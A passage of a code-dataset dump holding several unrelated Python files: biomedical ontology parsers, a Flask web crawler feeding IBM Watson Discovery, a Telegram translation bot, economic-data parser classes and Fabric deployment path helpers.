__init__(self, url):\n super(CHEBIParser, self).__init__(url)\n self.chebi_file = url\n self.classy = '{http://www.w3.org/2002/07/owl#}Class'\n self.label = '{http://www.w3.org/2000/01/rdf-schema#}label'\n self.altId = '{http://purl.obolibrary.org/obo#}altId'\n self.synonym = '{http://purl.obolibrary.org/obo#}Synonym'\n\n def parse(self):\n\n with open(self.chebi_file, 'rb') as cf:\n tree = etree.iterparse(cf, tag=self.classy)\n for event, elem in tree:\n if len(elem.values()) != 0:\n chebi_dict = {}\n synonyms = set()\n alt_ids = set()\n name = ''\n vals = elem.values()\n chebi_dict['primary_id'] = vals[0].split('CHEBI_')[1]\n children = elem.getchildren()\n for child in children:\n if child.tag == self.label:\n name = child.text\n if child.tag == self.altId:\n alt_ids.add(child.text.split(':')[1])\n if child.tag == self.synonym:\n synonyms.add(child.text)\n chebi_dict['name'] = name\n chebi_dict['alt_ids'] = alt_ids\n chebi_dict['synonyms'] = synonyms\n\n yield chebi_dict\n\n def __str__(self):\n return 'CHEBI_Parser'\n\n\nclass PubNamespaceParser(Parser):\n\n def __init__(self, url):\n super(PubNamespaceParser, self).__init__(url)\n self.pub_file = url\n\n def parse(self):\n column_headers = ['pubchem_id', 'synonym']\n pub_reader = csv.DictReader(gzip_to_text(self.pub_file), delimiter='\\t',\n fieldnames=column_headers)\n\n with open(self.pub_file, 'r') as fp:\n pub_reader = csv.DictReader(fp, delimiter='\\t',\n fieldnames=column_headers)\n\n for row in pub_reader:\n yield row\n\n def __str__(self):\n return 'PubNamespace_Parser'\n\n\nclass PubEquivParser(Parser):\n\n def __init__(self, url):\n super(PubEquivParser, self).__init__(url)\n self.cid_file = url\n\n def parse(self):\n\n column_headers = ['PubChem SID', 'Source', 'External ID', 'PubChem CID']\n cid_reader = csv.DictReader(gzip_to_text(self.cid_file), delimiter='\\t',\n fieldnames=column_headers)\n\n for row in cid_reader:\n yield row\n\n def __str__(self):\n return 'PubEquiv_Parser'\n\n\nclass SCHEMParser(Parser):\n\n def __init__(self, url):\n super(SCHEMParser, self).__init__(url)\n self.schem_file = url\n\n def parse(self):\n isFalse = True\n with open(self.schem_file, 'r') as fp:\n for line in fp.readlines():\n if '[Values]' not in line and isFalse:\n continue\n elif '[Values]' in line:\n isFalse = False\n continue\n else:\n schem_id = line.split('|')[0]\n yield {'schem_id' : schem_id }\n\n def __str__(self):\n return 'SCHEM_Parser'\n\n\nclass SDISParser(Parser):\n\n def __init__(self, url):\n super(SDISParser, self).__init__(url)\n self.sdis_file = url\n\n def parse(self):\n isFalse = True\n with open(self.sdis_file, 'r') as fp:\n for line in fp.readlines():\n if '[Values]' not in line and isFalse:\n continue\n elif '[Values]' in line:\n isFalse = False\n continue\n else:\n sdis_id = line.split('|')[0]\n yield {'sdis_id' : sdis_id }\n\n def __str__(self):\n return 'SDIS_Parser'\n\n\nclass SCHEMtoCHEBIParser(Parser):\n\n def __init__(self, url):\n super(SCHEMtoCHEBIParser, self).__init__(url)\n self.schem_to_chebi = url\n\n def parse(self):\n\n column_headers = ['SCHEM_term', 'CHEBIID', 'CHEBI_name']\n\n with open(self.schem_to_chebi, 'r') as fp:\n rdr = csv.DictReader(fp, delimiter='\\t', fieldnames=column_headers)\n\n for row in rdr:\n yield row\n\n def __str__(self):\n return 'SCHEMtoCHEBI_Parser'\n\n\nclass SDIStoDOParser(Parser):\n\n def __init__(self, url):\n super(SDIStoDOParser, self).__init__(url)\n self.sdis_to_do = url\n\n def parse(self):\n\n column_headers = ['SDIS_term', 'DOID', 'DO_name']\n\n with open(self.sdis_to_do, 'r') as fp:\n rdr = csv.DictReader(fp, delimiter='\\t', fieldnames=column_headers)\n\n for row in rdr:\n yield row\n\n def __str__(self):\n return 'SDIStoDO_Parser'\n\n\nclass GOBPParser(Parser):\n\n def __init__(self, url):\n super(GOBPParser, self).__init__(url)\n self.go_file = url\n\n def parse(self):\n\n # parse xml tree using lxml\n parser = etree.XMLParser(ns_clean=True, recover=True, encoding='UTF-8')\n with gzip.open(self.go_file, 'r') as go:\n root = etree.parse(go, parser)\n bp_terms = root.xpath(\"/obo/term [namespace = 'biological_process' and not(is_obsolete)]\")\n\n # iterate the NON-OBSOLETE biological_process terms\n for t in bp_terms:\n bp_termid = t.find('id').text\n bp_termname = t.find('name').text\n if t.findall('alt_id') is not None:\n bp_altids = [x.text for x in t.findall('alt_id')]\n else:\n bp_altids = False\n yield { 'termid' : bp_termid, 'termname' : bp_termname,\n 'alt_ids' : bp_altids }\n\n def obsolete_parse(self):\n\n # parse xml tree using lxml\n parser = etree.XMLParser(ns_clean=True, recover=True, encoding='UTF-8')\n with gzip.open(self.go_file, 'r') as go:\n root = etree.parse(go, parser)\n bp_terms = root.xpath(\"/obo/term [namespace = 'biological_process' and is_obsolete]\")\n\n # iterate the OBSOLETE biological_process terms\n for t in bp_terms:\n bp_termid = t.find('id').text\n bp_termname = t.find('name').text\n if t.findall('alt_id') is not None:\n bp_altids = [x.text for x in t.findall('alt_id')]\n else:\n bp_altids = False\n yield { 'termid' : bp_termid, 'termname' : bp_termname,\n 'alt_ids' : bp_altids }\n\n\n def __str__(self):\n return 'GOBP_Parser'\n\n\nclass GOCCParser(Parser):\n\n def __init__(self, url):\n super(GOCCParser, self).__init__(url)\n self.go_file = url\n self.mesh_file = 'meshcs_to_gocc.csv'\n\n def parse(self):\n\n # initialize empty dictionaries using tuple assignment\n cc_parents, accession_dict, term_dict = {}, {}, {}\n\n # parse xml tree using lxml\n parser = etree.XMLParser(ns_clean=True, recover=True, encoding='UTF-8')\n root = etree.parse(self.go_file, parser)\n cc_terms = root.xpath(\"/obo/term [namespace = 'cellular_component' and not(is_obsolete)]\")\n\n # iterate the NON-OBSOLETE complex terms to build parent dictionary\n for t in cc_terms:\n cc_termid = t.find(\"id\").text\n cc_parent_ids = [isa.text for isa in t.findall(\"is_a\")]\n cc_parents[cc_termid] = cc_parent_ids\n\n for t in cc_terms:\n cc_termid = t.find('id').text\n cc_termname = t.find('name').text\n cc_parent_stack = cc_parents[cc_termid]\n if t.findall('alt_id') is not None:\n cc_altids = [x.text for x in t.findall('alt_id')]\n else:\n cc_altids = False\n complex = False\n\n if cc_termid == \"GO:0032991\":\n complex = True\n elif t.find(\"is_root\") is not None:\n complex = False\n else:\n cc_parent_stack.extend(cc_parents[cc_termid])\n while len(cc_parent_stack) > 0:\n cc_parent_id = cc_parent_stack.pop()\n\n if cc_parent_id == \"GO:0032991\":\n complex = True\n break\n\n if cc_parent_id in cc_parents:\n cc_parent_stack.extend(cc_parents[cc_parent_id])\n\n yield { 'termid' : cc_termid, 'termname' : cc_termname,\n 'altids' : cc_altids, 'complex' : complex }\n\n def obsolete_parse(self):\n\n # initialize empty dictionaries using tuple assignment\n cc_parents, accession_dict, term_dict = {}, {}, {}\n\n # parse xml tree using lxml\n parser = etree.XMLParser(ns_clean=True, recover=True, encoding='UTF-8')\n root = etree.parse(self.go_file, parser)\n cc_terms = root.xpath(\"/obo/term [namespace = 'cellular_component' and is_obsolete]\")\n\n # iterate the OBSOLETE complex terms to build parent dictionary\n for t in cc_terms:\n cc_termid = t.find(\"id\").text\n cc_parent_ids = [isa.text for isa in t.findall(\"is_a\")]\n cc_parents[cc_termid] = cc_parent_ids\n\n for t in cc_terms:\n cc_termid = t.find('id').text\n cc_termname = t.find('name').text\n cc_parent_stack = cc_parents[cc_termid]\n if t.findall('alt_id') is not None:\n cc_altids = [x.text for x in t.findall('alt_id')]\n else:\n cc_altids = False\n complex = False\n\n if cc_termid == \"GO:0032991\":\n complex = True\n elif t.find(\"is_root\") is not None:\n complex = False\n else:\n cc_parent_stack.extend(cc_parents[cc_termid])\n while len(cc_parent_stack) > 0:\n cc_parent_id = cc_parent_stack.pop()\n\n if cc_parent_id == \"GO:0032991\":\n complex = True\n break\n\n if cc_parent_id in cc_parents:\n cc_parent_stack.extend(cc_parents[cc_parent_id])\n\n yield { 'termid' : cc_termid, 'termname' : cc_termname,\n 'altids' : cc_altids, 'complex' : complex }\n\n def __str__(self):\n return 'GOCC_Parser'\n\n\nclass MESHParser(Parser):\n\n def __init__(self, url):\n super(MESHParser, self).__init__(url)\n self.mesh_file = url\n\n def parse(self):\n\n # ui - unique identifier / mh - mesh header\n # mn - tree # / st - semantic type\n ui = ''\n mh = ''\n mns = set()\n sts = set()\n synonyms = set()\n firstTime = True\n with open(self.mesh_file, 'r') as fp:\n for line in fp.readlines():\n if line.startswith('MH ='):\n mh = line.split('=')[1].strip()\n elif line.startswith('UI ='):\n ui = line.split('=')[1].strip()\n elif line.startswith('MN ='):\n mn = line.split('=')[1].strip()\n mns.add(mn)\n elif line.startswith('ST ='):\n st = line.split('=')[1].strip()\n sts.add(st)\n elif line.startswith('PRINT ENTRY ='):\n entry = line.split('=')[1].strip()\n if '|EQV|' in line:\n entries = entry.split('|')\n last = entries[-1]\n num_syns = last.count('a')\n while num_syns > 0:\n num_syns = num_syns - 1\n s = entries[num_syns]\n synonyms.add(s.strip())\n else:\n if '|' not in entry:\n synonyms.add(entry)\n elif line.startswith('ENTRY ='):\n entry = line.split('=')[1].strip()\n if '|EQV|' in line:\n entries = entry.split('|')\n last = entries[-1]\n num_syns = last.count('a')\n while num_syns > 0:\n num_syns = num_syns - 1\n s = entries[num_syns]\n synonyms.add(s.strip())\n else:\n if '|' not in entry:\n synonyms.add(entry)\n elif line.startswith('*NEWRECORD'):\n # file begins with *NEWRECORD so skip that one (dont yield)\n if firstTime:\n firstTime = False\n continue\n else:\n\n yield { 'ui' : ui, 'mesh_header' : mh,\n 'mns' : mns, 'sts' : sts,\n 'synonyms' : synonyms }\n ui = ''\n mh = ''\n mns = set()\n sts = set()\n synonyms = set()\n\n def __str__(self):\n return 'MESH_Parser'\n\n\nclass SwissWithdrawnParser(Parser):\n\n def __init__(self, url):\n super(SwissWithdrawnParser, self).__init__(url)\n self.s_file = url\n\n def parse(self):\n\n with open(self.s_file, 'r') as fp:\n marker = False\n for line in fp.readlines():\n if '____' in line:\n marker = True\n continue\n if marker is False:\n continue\n\n yield {'accession' : line.strip()}\n\n def __str__(self):\n return 'SwissWithdrawn_Parser'\n\n\nclass MESHChangesParser(Parser):\n\n def __init__(self, url):\n super(MESHChangesParser, self).__init__(url)\n self.mesh_file = url\n\n def parse(self):\n\n with open(self.mesh_file, 'r') as fp:\n for line in fp.readlines():\n if 'MH OLD =' in line:\n mh_old = line.split('= ')[1]\n if '#' in mh_old:\n mh_old = mh_old.split(' #')[0]\n elif '[' in mh_old:\n mh_old = mh_old.split(' [')[0]\n if 'MH NEW =' in line:\n mh_new = line.split('= ')[1]\n if '#' in mh_new:\n mh_new = mh_new.split(' #')[0]\n elif '[' in mh_new:\n mh_new = mh_new.split(' [')[0]\n yield { 'mh_old' : mh_old.strip(), 'mh_new' : mh_new.strip() }\n mh_old = ''\n mh_new = ''\n\n def __str__(self):\n return 'MESHChanges_Parser'\n\n\ndef is_deprecated(child_list):\n dep = False\n deprecated = '{http://www.w3.org/2002/07/owl#}deprecated'\n for child in child_list:\n if child.tag == deprecated and child.text == 'true':\n dep = True\n return dep\n\n\n# custom exception to break out of the loop when an deprecated\n# term has been seen.\nclass DeprecatedTermException(Exception):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\n# excludes deprecated terms which are not included in the namespace\nclass DOParser(Parser):\n\n def __init__(self, url):\n super(DOParser, self).__init__(url)\n self.do_file = url\n self.classy = '{http://www.w3.org/2002/07/owl#}Class'\n self.deprecated = '{http://www.w3.org/2002/07/owl#}deprecated'\n self.dbxref = '{http://www.geneontology.org/formats/oboInOwl#}hasDbXref'\n self.id = '{http://www.geneontology.org/formats/oboInOwl#}id'\n self.label = '{http://www.w3.org/2000/01/rdf-schema#}label'\n\n def parse(self):\n\n with open(self.do_file, 'rb') as df:\n tree = etree.iterparse(df, tag=self.classy)\n for event, elem in tree:\n do_dict = {}\n dbxrefs = []\n name = ''\n id = ''\n try:\n if len(elem.values()) != 0:\n children = elem.getchildren()\n if is_deprecated(children):\n raise DeprecatedTermException(children)\n else:\n for child in children:\n if child.tag == self.dbxref:\n dbxrefs.append(child.text)\n elif child.tag == self.id:\n id = child.text.split(':')[1]\n elif child.tag == self.label:\n name = child.text\n do_dict['name'] = name\n do_dict['id'] = id\n do_dict['dbxrefs'] = dbxrefs\n yield do_dict\n except DeprecatedTermException:\n continue\n\n def __str__(self):\n return 'DO_Parser'\n\n\n# includes deprecated terms (for change-log)\nclass DODeprecatedParser(Parser):\n\n def __init__(self, url):\n super(DODeprecatedParser, self).__init__(url)\n self.do_file = url\n self.classy = '{http://www.w3.org/2002/07/owl#}Class'\n self.deprecated = '{http://www.w3.org/2002/07/owl#}deprecated'\n self.dbxref = '{http://www.geneontology.org/formats/oboInOwl#}hasDbXref'\n self.id = '{http://www.geneontology.org/formats/oboInOwl#}id'\n self.label = '{http://www.w3.org/2000/01/rdf-schema#}label'\n\n def parse(self):\n\n with open(self.do_file, 'rb') as df:\n tree = etree.iterparse(df, tag=self.classy)\n for event, elem in tree:\n do_dep_dict = {}\n dbxrefs = []\n name = ''\n id = ''\n dep = False\n if len(elem.values()) != 0:\n children = elem.getchildren()\n for child in children:\n if child.tag == self.dbxref:\n dbxrefs.append(child.text)\n elif child.tag == self.id:\n id = child.text.split(':')[1]\n elif child.tag == self.label:\n name = child.text\n elif child.tag == self.deprecated:\n dep = True\n do_dep_dict['name'] = name\n do_dep_dict['id'] = id\n do_dep_dict['dbxrefs'] = dbxrefs\n do_dep_dict['deprecated'] = dep\n yield do_dep_dict\n\n def __str__(self):\n return 'DODeprecated_Parser'\n","sub_path":"parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":36278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"429887903","text":"import datetime\nimport json\nimport os\nimport requests\nimport time\nfrom bs4 import BeautifulSoup\nfrom dotenv import load_dotenv\nfrom flask import jsonify\nfrom flask import request\nfrom ibm_watson import DiscoveryV1\n\nfrom server import app\nfrom server.routes import prometheus\nfrom server.config import db\nfrom urllib.parse import urlparse\n\n# Max crawl depth\nmax_depth = 1\n\n# Create array to store URLs that we have already crawled\ncrawled_urls = []\n#new_urls = []\n\n# Initialize the Discovery client\n#\nload_dotenv()\nDISCOVERY_COLLECTION_ID = os.environ.get('DISCOVERY_COLLECTION_ID')\nDISCOVERY_ENVIRONMENT_ID = os.environ.get('DISCOVERY_ENVIRONMENT_ID')\n\ndiscovery = None\nif DISCOVERY_COLLECTION_ID and DISCOVERY_ENVIRONMENT_ID:\n discovery = DiscoveryV1(version='2020-12-08')\n\n\n@app.route(\"/api/v1/crawlme\", methods=['POST'])\n@prometheus.track_requests\ndef crawlme():\n print(\"I'm in the crawlme function!\")\n \"\"\"crawlme url route\"\"\"\n crawl_this = request.get_json(force=True)\n print(\"INPUT:\", crawl_this)\n \n # Check if url=pause; workaround for Assistant pauses not working with SMS with Twilio integration\n if crawl_this.get('url')=='pause':\n print(\"Sleeping...\")\n # Wait for 6 seconds\n time.sleep(6)\n print(\"Slept for 6 seconds\")\n\n else:\n # TODO: queue these and run with threading\n crawl_url(crawl_this.get('url'), datetime.datetime.now(), depth=0)\n\n state = {\"status\": \"Accepted\"}\n return jsonify(state), 202\n\n\ndef crawl_url(url, posted, depth=0, root_url=None):\n new_urls = []\n print(\"url coming into crawl_url:\", url)\n if \"http\" not in url:\n url = \"https://\" + url\n print(\"new url after adding https (if needed):\", url)\n\n if ' ' in url:\n url = url.replace(' ', '')\n print(\"new url after removing spaces:\", url)\n \n root_url = root_url or url\n \n # if db.is_crawled(url):\n if url in crawled_urls:\n print(\"Skipping already crawled url:\", url)\n return\n crawled_urls.append(url)\n\n # filter out urls that end in .png, .js, .css\n end_url = os.path.basename(url)\n print(\"url basename:\", end_url)\n\n if end_url.endswith(('.png', '.js', '.css', '.jpg', '.aspx', '.php', '.jsp', '.php', '.rss', '.ashx', '.ece', '.mp3', '.mp4', '.ico')):\n print('skipping urls with this ending:', url)\n return\n\n try:\n page = requests.get(url)\n except Exception as e:\n print(e)\n return\n\n db.insert_crawl_me(\n {\n 'URL': url,\n 'PARENT_URL': root_url,\n 'POSTED': posted,\n 'DEPTH': depth,\n 'CRAWLED': datetime.datetime.now(),\n 'STATUS': page.status_code\n }\n )\n\n soup = BeautifulSoup(page.content, 'lxml')\n send_to_discovery(soup.prettify(), url)\n \n # Check for a client-side redirect URL\n redirect = soup.find('meta',attrs={'http-equiv':'refresh'})\n if redirect:\n wait,text=redirect[\"content\"].split(\";\")\n if text.strip().lower().startswith(\"url=\"):\n redirect_url=text[4:]\n print('redirect_url = ', redirect_url)\n crawl_url(redirect_url, posted, depth, root_url) \n\n if depth < max_depth:\n depth += 1\n # recursive crawl...\n # extract links from 'href' and 'src'\n new_links = [\n item['href'] if item.get('href') is not None else item['src']\n for item in soup.select('[href^=\"http\"], [src^=\"http\"]')\n ]\n\n for x in new_links:\n modified_link = x.split('?')[0]\n new_urls.append(modified_link)\n print('All URLs found: ', new_urls)\n \n for i in new_urls:\n crawl_url(i, posted, depth, root_url)\n\ndef send_to_discovery(text_io, url):\n\n if not discovery:\n print(\"---> Skipping Discovery feed <--- (not configured)\")\n return\n \n # use url domain-path as file name\n domain = urlparse(url).netloc\n path = urlparse(url).path.split(\"/\")\n filename = str(domain)\n if path:\n for i in range(1, len(path)):\n filename = str(filename + \"\\/\" + path[i])\n print('filename:', filename)\n\n # output_file = os.path.join(url_as_string + suffix)\n\n add_doc = discovery.add_document(\n environment_id=DISCOVERY_ENVIRONMENT_ID,\n collection_id=DISCOVERY_COLLECTION_ID,\n file=text_io, filename=filename).get_result()\n\n print(json.dumps(add_doc, indent=2))\n\n\n","sub_path":"server/routes/crawlme.py","file_name":"crawlme.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"522045405","text":"from googletrans import Translator\n\nimport telegram\nfrom telegram.ext import Updater\nfrom telegram.ext import CommandHandler\n\n\ndef start(bot, update):\n bot.send_message(chat_id=update.message.chat_id, text=\"Hola! Soc un bot traductor.\")\n\n\ndef trad(bot, update):\n translator = Translator()\n miss_orig = update.message.text[6:] # esborra el \"/trad \" del començament del missatge\n miss_trad = translator.translate(miss_orig).text\n bot.send_message(chat_id=update.message.chat_id, text=miss_trad)\n\n\nTOKEN = open('token.txt').read().strip()\nupdater = Updater(token=TOKEN)\ndispatcher = updater.dispatcher\n\ndispatcher.add_handler(CommandHandler('start', start))\ndispatcher.add_handler(CommandHandler('trad', trad))\n\nupdater.start_polling()\n","sub_path":"bot-trad.py","file_name":"bot-trad.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"338338853","text":"\"\"\"Parser interfaces.\"\"\"\n\nimport json\n\nfrom parsers.helpers import DateHelper, Markdown, interpret_frequency\n\n# individual parser functions\nimport parsers.getter.brent as brent\nimport parsers.getter.cbr_fx as cbr_fx\nimport parsers.getter.kep as kep\nimport parsers.getter.ust as ust\n\n\nclass ParserBase:\n def __repr__(self):\n start = DateHelper.as_string(self.start)\n return f'{self.__class__.__name__}(\\'{start}\\')'\n\n @classmethod\n def as_markdown(cls):\n url_str = Markdown.short_link(cls.source_url)\n freq_str = interpret_frequency(cls.freq)\n varname_str = \", \".join(cls.all_varnames)\n\n rows = [(\"Parser\", cls.__name__),\n (\"Description\", cls.__doc__ or ''),\n (\"URL\", url_str or ''),\n (\"Frequency\", freq_str),\n (\"Variables\", varname_str or ''),\n (\"Code\", url_str or '')]\n return Markdown.table(rows)\n\n\nclass RosstatKEP_Base(ParserBase):\n \"\"\"Sections of Rosstat Short-term economic indicators ('KEP') publication.\"\"\"\n observation_start_date = DateHelper.make_date('1999-01-31')\n source_url = (\"http://www.gks.ru/wps/wcm/connect/\"\n \"rosstat_main/rosstat/ru/statistics/\"\n \"publications/catalog/doc_1140080765391\")\n all_varnames = ['CPI', 'GDP', 'etc']\n\n def __init__(self, start=None):\n if start is None:\n self.start = self.observation_start_date\n else:\n self.start = DateHelper.make_date(start)\n\n def sample(self):\n yield {\"date\": \"2015-11-30\", \"freq\": self.freq, \"name\": \"CPI_rog\", \"value\": 100.8}\n yield {\"date\": \"2015-11-30\", \"freq\": self.freq, \"name\": \"RUR_EUR_eop\", \"value\": 70.39}\n yield {\"date\": \"2015-12-31\", \"freq\": self.freq, \"name\": \"CPI_rog\", \"value\": 100.8}\n yield {\"date\": \"2015-12-31\", \"freq\": self.freq, \"name\": \"RUR_EUR_eop\", \"value\": 79.7}\n\n def yield_dicts(self):\n return kep.yield_kep_dicts(self.freq)\n\n\nclass RosstatKEP_Monthly(RosstatKEP_Base):\n \"\"\"Monthly indicators from Rosstat 'KEP' publication\"\"\"\n freq = 'm'\n\n\nclass RosstatKEP_Quarterly(RosstatKEP_Base):\n \"\"\"Quarterly indicators from Rosstat 'KEP' publication\"\"\"\n freq = 'q'\n\n\nclass RosstatKEP_Annual(RosstatKEP_Base):\n \"\"\"Annual indicators from Rosstat 'KEP' publication\"\"\"\n freq = 'a'\n\n\nclass CBR_USD(ParserBase):\n \"\"\"Bank of Russia official USD to RUB exchange rate\"\"\"\n freq = 'd'\n observation_start_date = DateHelper.make_date('1992-01-01') # '1991-07-01'\n source_url = \"http://www.cbr.ru/scripts/Root.asp?PrtId=SXML\"\n all_varnames = ['USDRUR_CB']\n\n def __init__(self, start=None):\n if start is None:\n self.start = self.observation_start_date\n else:\n self.start = DateHelper.make_date(start)\n self.end = DateHelper.today()\n\n def yield_dicts(self):\n return cbr_fx.get_cbr_er(self.start, self.end)\n\n def sample(self):\n \"\"\"Yields dictionaries with sample datapoints.\"\"\"\n return iter([{'date': '2017-09-15', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 57.7706},\n {'date': '2017-09-16', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 57.5336},\n {'date': '2017-09-19', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 57.6242},\n {'date': '2017-09-20', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 58.0993},\n {'date': '2017-09-21', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 58.129},\n {'date': '2017-09-22', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 58.2242},\n {'date': '2017-09-23', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 57.6527},\n {'date': '2017-09-26', 'freq': 'd', 'name': 'USDRUR_CB', 'value': 57.566}])\n\n\nclass BrentEIA(ParserBase):\n \"\"\"Brent oil price from US EIA\"\"\"\n freq = 'd'\n observation_start_date = DateHelper.make_date('1987-05-15')\n source_url = \"https://www.eia.gov/opendata/qb.php?category=241335\"\n all_varnames = ['BRENT']\n\n def __init__(self, start=None):\n if start is None:\n self.start = self.observation_start_date\n else:\n self.start = DateHelper.make_date(start)\n\n def yield_dicts(self):\n for p in brent.yield_brent_dicts():\n if DateHelper.make_date(p['date']) >= self.start:\n yield p\n\n def sample(self):\n \"\"\"Yield a few dictionaries with datapoints.\"\"\"\n return iter([{'date': '2017-09-18', 'freq': 'd', 'name': 'BRENT', 'value': 55.5},\n {'date': '2017-09-15', 'freq': 'd', 'name': 'BRENT', 'value': 56.18},\n {'date': '2017-09-14', 'freq': 'd', 'name': 'BRENT', 'value': 56.76},\n {'date': '2017-09-13', 'freq': 'd', 'name': 'BRENT', 'value': 55.52},\n {'date': '2017-09-12', 'freq': 'd', 'name': 'BRENT', 'value': 55.06},\n {'date': '2017-09-11', 'freq': 'd', 'name': 'BRENT', 'value': 54.2}]\n )\n# TODO:\n# class USTbonds(ParserBase):\n# \"\"\"Brent oil price from US EIA\"\"\"\n# freq = 'd'\n# observation_start_date = DateHelper.make_date('1987-05-15')\n# source_url = \"https://www.eia.gov/opendata/qb.php?category=241335\"\n# all_varnames = ['BRENT']\n#\n# def __init__(self, start=None):\n# if start is None:\n# self.start = self.observation_start_date\n# else:\n# self.start = DateHelper.make_date(start)\n#\n# def yield_dicts(self):\n# for p in brent.yield_brent_dicts():\n# if DateHelper.make_date(p['date']) >= self.start:\n# yield p\n#\n# def sample(self):\n# \"\"\"Yield a few dictionaries with datapoints.\"\"\"\n# return iter([{'date': '2017-09-18', 'freq': 'd', 'name': 'BRENT', 'value': 55.5},\n# {'date': '2017-09-15', 'freq': 'd', 'name': 'BRENT', 'value': 56.18},\n# {'date': '2017-09-14', 'freq': 'd', 'name': 'BRENT', 'value': 56.76},\n# {'date': '2017-09-13', 'freq': 'd', 'name': 'BRENT', 'value': 55.52},\n# {'date': '2017-09-12', 'freq': 'd', 'name': 'BRENT', 'value': 55.06},\n# {'date': '2017-09-11', 'freq': 'd', 'name': 'BRENT', 'value': 54.2}]\n# )\n\n\nclass Dataset:\n \"\"\"Operations related to all parsers.\"\"\"\n\n parsers = [RosstatKEP_Monthly,\n RosstatKEP_Quarterly,\n RosstatKEP_Annual,\n CBR_USD,\n BrentEIA,\n # USTbonds\n ]\n\n def get_sample():\n return [d for parser in Dataset.parsers\n for d in parser().sample()]\n\n def yield_dicts(start=None):\n for parser in Dataset.parsers:\n for datapoint in parser(start).yield_dicts():\n yield datapoint\n\n def as_markdown():\n tables = [cls.as_markdown() for cls in Dataset.parsers]\n return '\\n\\n'.join(tables)\n\n def serialize(filename='dataset.json'):\n def to_float(d):\n d['value'] = float(d['value'])\n return d\n gen = map(to_float, Dataset.yield_dicts())\n with open(filename, 'w') as f:\n json.dump(list(gen), f)\n\n\nif __name__ == \"__main__\":\n from pprint import pprint\n print('Sample dataset:')\n pprint(Dataset.get_sample())\n\n print('\\nMarkdown descriptions:')\n print(Dataset.as_markdown())\n\n fx = CBR_USD('2017-09-01').yield_dicts()\n oil = BrentEIA('2017-09-01').yield_dicts()\n kep_m = RosstatKEP_Monthly('2017-06').yield_dicts()\n\n # this generator seeds the database\n gen = Dataset.yield_dicts()\n\n Dataset.serialize()\n","sub_path":"parsers/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":7643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"95785441","text":"from typing import Tuple\n\nclass Solution:\n def complexNumberMultiply(self, num1: str, num2: str) -> str:\n \n def parse_complex(s: str) -> Tuple[int,int]:\n sp = s.split('+')\n assert len(sp) == 2\n real = int(sp[0])\n img = int(sp[1][:-1])\n return real, img\n \n r1, i1 = parse_complex(num1)\n r2, i2 = parse_complex(num2)\n \n rr = r1*r2 - i1*i2\n ir = r1*i2 + i1*r2\n return f'{rr}+{ir}i'\n","sub_path":"Practice-2021/August/Python3/complex_number_multiplication.py","file_name":"complex_number_multiplication.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"266768904","text":"# -*- encoding:utf8 -*-\nimport posixpath\nimport os\nfrom fabric.api import env, cd, require, abort\n\n\n## Utils ####################\n\ndef join_paths(a, *p):\n \"\"\"\n Joins multiple paths land ensures that the '/' is removed from the end.\n\n Any path in *p that starts with / will be have the / removed.\n\n \"\"\"\n p = map(lambda i: i.lstrip('/'), p)\n return posixpath.join(a, *p).rstrip('/')\n\n\n## Known paths ##############\n\ndef deploy_path(sub_path=None):\n \"\"\"\n Deployment root path, the root of the deployment structure.\n\n :param sub_path: A path below the package path.\n\n \"\"\"\n require('project_name')\n deploy_path_root = env.get('deploy_path_root', '/opt/webapps')\n return join_paths(deploy_path_root, env.project_name,\n sub_path if sub_path else '')\n\n\ndef package_path(revision=None, sub_path=None):\n \"\"\"\n Package path, the path were the python application package is deployed to.\n\n Uses a number of fall-backs to get the current path.\n\n :param revision: A specific revision name.\n :param sub_path: A path below the package path.\n\n \"\"\"\n if not revision:\n revision = env.get('revision', 'current')\n return deploy_path(join_paths('app', revision,\n sub_path if sub_path else ''))\n\n\ndef log_path():\n \"\"\"\n Path where log files are located.\n\n \"\"\"\n require('project_name', 'package_name')\n log_path_root = env.get('log_path_root', '/var/log/webapps')\n return join_paths(log_path_root, env.project_name, env.package_name)\n\n\ndef wsgi_socket_path():\n \"\"\"\n Path of WSGI socket, this is used to connect web-server to application.\n\n \"\"\"\n return deploy_path('var/wsgi.sock')\n\n\ndef remote_config_file(base_path, name_prefix=None, extension='.conf'):\n \"\"\"\n Determine the correct remote config file path.\n\n :param base_path: location of the config file on remote file system.\n :param name_prefix: an optional prefix for the configuration file name.\n :param extension: file extension of config files.\n\n \"\"\"\n require('project_name')\n path_elements = {\n 'name': env.project_name,\n 'prefix': name_prefix,\n 'ext': extension,\n }\n if name_prefix:\n return join_paths(base_path, '%(prefix)s-%(name)s%(ext)s' % path_elements)\n else:\n return join_paths(base_path, '%(name)s%(ext)s' % path_elements)\n\n\n## Local paths ##############\n\ndef join_local_paths(a, *p):\n \"\"\"\n Joins multiple paths and ensures that there is no path separator on the\n end.\n\n Any path in *p that starts with a separator will be have the separator\n removed.\n\n \"\"\"\n p = map(lambda i: i.lstrip(os.path.sep), p)\n return os.path.normpath(os.path.join(a, *p).rstrip(os.path.sep))\n\n\ndef local_path(sub_path=None):\n \"\"\"\n Local path relative to current fabfile.\n\n :param sub_path: local sub path relative to current fabfile.\n\n \"\"\"\n require('real_fabfile')\n fabfile_path = os.path.dirname(env.real_fabfile)\n return join_local_paths(fabfile_path, sub_path if sub_path else '')\n\n\ndef local_working_path(sub_path=None, file_name=None, ensure_exists=True):\n \"\"\"\n Path to a local working path.\n\n This path can be changed from the default `den` via the fabric environment\n parameter `working_path`.\n\n :param sub_path: sub path within working directory.\n :param file_name: optional file name within directory (this is a separate\n option to allow the 